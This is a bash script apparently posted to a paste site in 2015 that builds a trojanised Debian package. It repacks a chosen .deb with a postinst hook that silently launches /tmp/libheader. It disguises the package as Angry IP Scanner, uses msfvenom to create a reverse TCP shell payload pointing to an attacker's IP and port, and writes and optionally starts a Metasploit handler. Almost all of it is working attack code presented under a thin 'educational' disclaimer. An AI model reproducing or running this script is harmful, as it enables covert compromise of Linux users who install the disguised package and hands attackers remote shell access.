
Feb 23rd, 2015
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  1. #!/bin/bash
  2. # This scrpit will help creat a debian package
  3. # trojan for hack debian operating systems.
  4. # Its a dirty little script for EDUACTIONAL
  6. #
  7. # The user is entirely responsible for
  8. # any use and damage caused by this script.
  9. #
  10. # Created by </CybaFrE3z>
  11. #
  12. #
  13. redbold='\E[1;31m'
  14. red='\E[0;31m'
  15. yellow='\E[33m'
  16. white='\E[37m'
  17. endc='\E[0m'
  18. clear
  19. echo -e "
  20. $white==============================================================$endc
  21.                    $redbold\DEB PACKAGE INJECTOR$endc
  22.                $yellow[Info]$endc$white This script injects a trojan
  23.                    in a debian package file.$endc
  24.                            $red\By CybaFrE3z$endc
  25. $red--------------------------------------------------------------$endc
  26. $$endc
  27. $red--------------------------------------------------------------"$endc
  28. echo
  29. #Check root
  30. if [ "$(id -u)" != "0" ]; then
  31.    echo -e "$red[!] This script must be run as root$endc" 1>&2
  32.    echo
  33.    exit 1
  34. fi
  36. time=$(date +"%H_%M_%S")
  37. echo -ne "$white[+] Path to .deb to inject. (Less than 3MB is recommended)
  38. > "$endc
  39. read path
  40. echo
  41. echo -ne "$white[+] Our listening IP address.
  42. > "$endc
  43. read IP
  44. echo
  45. echo -ne "$white[+] Our listening Port.
  46. > "$endc
  47. read PORT
  48. echo
  49. echo
  50. echo -e "$white[+] Processing....$endc"
  51. mkdir workdir
  52. cd workdir
  53. dpkg -x $path package
  54. cd package && mkdir DEBIAN && cd DEBIAN
  55. echo "chmod 2755 /tmp/libheader && /tmp/libheader &" >> postinst
  56. chmod 755 postinst
  57. echo -e "Package: ipscan
  58. Section: net
  59. Version: 3.2-1
  60. Priority: optional
  61. Architecture: i386
  62. Maintainer: CybaFrE3z <>
  63. Description: Angry IP Scanner - fast and friendly IP Scanner
  64. Angry IP Scanner is a cross-platform network scanner written in Java.
  65. It can scan IP-based networks in any range, scan ports, and resolve
  66. other information.
  67. The program provides an easy to use GUI interface and is very extensible,
  68. see for more information." > control
  69. sleep 2
  70. cd ..
  71. mkdir tmp && cd tmp
  72. msfvenom -p linux/x86/shell/reverse_tcp LHOST=$IP LPORT=$PORT -f exe -o libheader
  73. cd ../..
  74. dpkg-deb --build package
  75. mv package.deb ../injected-package_$time.deb
  77. echo "use exploit/multi/handler
  78. set PAYLOAD linux/x86/meterpreter/reverse_tcp
  79. set LHOST $IP
  80. set LPORT $PORT
  81. exploit -j" > ../msf_handler_$time.rc
  82. cd ..
  84. chmod 777 injected-package_$time.deb
  85. chmod 777 msf_handler_$time.rc
  87. rm -rf workdir
  88. echo
  89. echo -e "$yellow[+] Done Creating trojan!"$endc
  90. echo -ne "$white[?] Do you want to start a handler now?
  91. (y/n):> "$endc
  92. read option
  93. if [[ $option = Y || $option = y ]] ;
  94. then
  95.     echo -e "$white[+] Starting metasploit handler...$endc"
  96.     sleep 2
  97.     msfconsole -r msf_handler_$time.rc
  98. else
  99.     echo -e "$yellow[+] Ok, Everything is done"$endc
  100.     echo -e "$yellow[+] Find package and RC file here:$endc $white$(pwd)$endc"
  101. fi
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